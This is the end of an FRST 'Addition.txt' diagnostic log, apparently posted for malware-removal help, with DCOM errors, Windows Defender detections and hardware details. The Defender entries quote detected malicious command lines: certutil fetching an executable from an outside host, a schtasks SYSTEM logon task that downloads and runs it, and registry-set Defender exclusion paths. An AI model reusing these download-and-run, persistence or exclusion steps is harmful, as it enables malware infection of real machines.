Error: (11/24/2019 07:12:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:11:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Windows Defender:
===================================
Date: 2019-11-24 19:12:13.754
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:12:11.511
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:07:55.432
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win32/Bomitag.D!ml
ID: 2147741007
Severity: Severe
Category: Trojan
Path: file:_C:\Program Files (x86)\Hadadn\68060836.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:07:39.663
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
Date: 2019-11-24 19:07:39.626
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...51&enterprise=0
Name: BrowserModifier:Win32/Neobar
ID: 225451
Severity: High
Category: Browser Modifier
Path: regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\csrss; regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\wup; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{291DB7AE-2C1B-4863-B103-F71CA48986BA}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckIE; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckU; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckUn; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program File
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1
CodeIntegrity:
===================================
Date: 2019-10-29 09:57:25.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-08-03 12:16:27.456
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-07-08 12:00:17.288
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-05-04 12:47:46.475
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-03-15 11:40:11.320
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-26 12:31:13.039
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 26%
Total physical RAM: 16331.55 MB
Available physical RAM: 12012.87 MB
Total Virtual: 16631.55 MB
Available Virtual: 10766.25 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:231.78 GB) (Free:62.77 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:152.18 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS
Drive h: (Seagate Expansion Drive) (Fixed) (Total:1863.01 GB) (Free:921.95 GB) NTFS
Drive p: () (Fixed) (Total:5 GB) (Free:0.35 GB) exFAT
\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)
Partition: GPT.
==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Attached Files
-
FRST.txt 58.62KB
170 downloads
-
Addition.txt 79.17KB
191 downloads
Sign In
Create Account
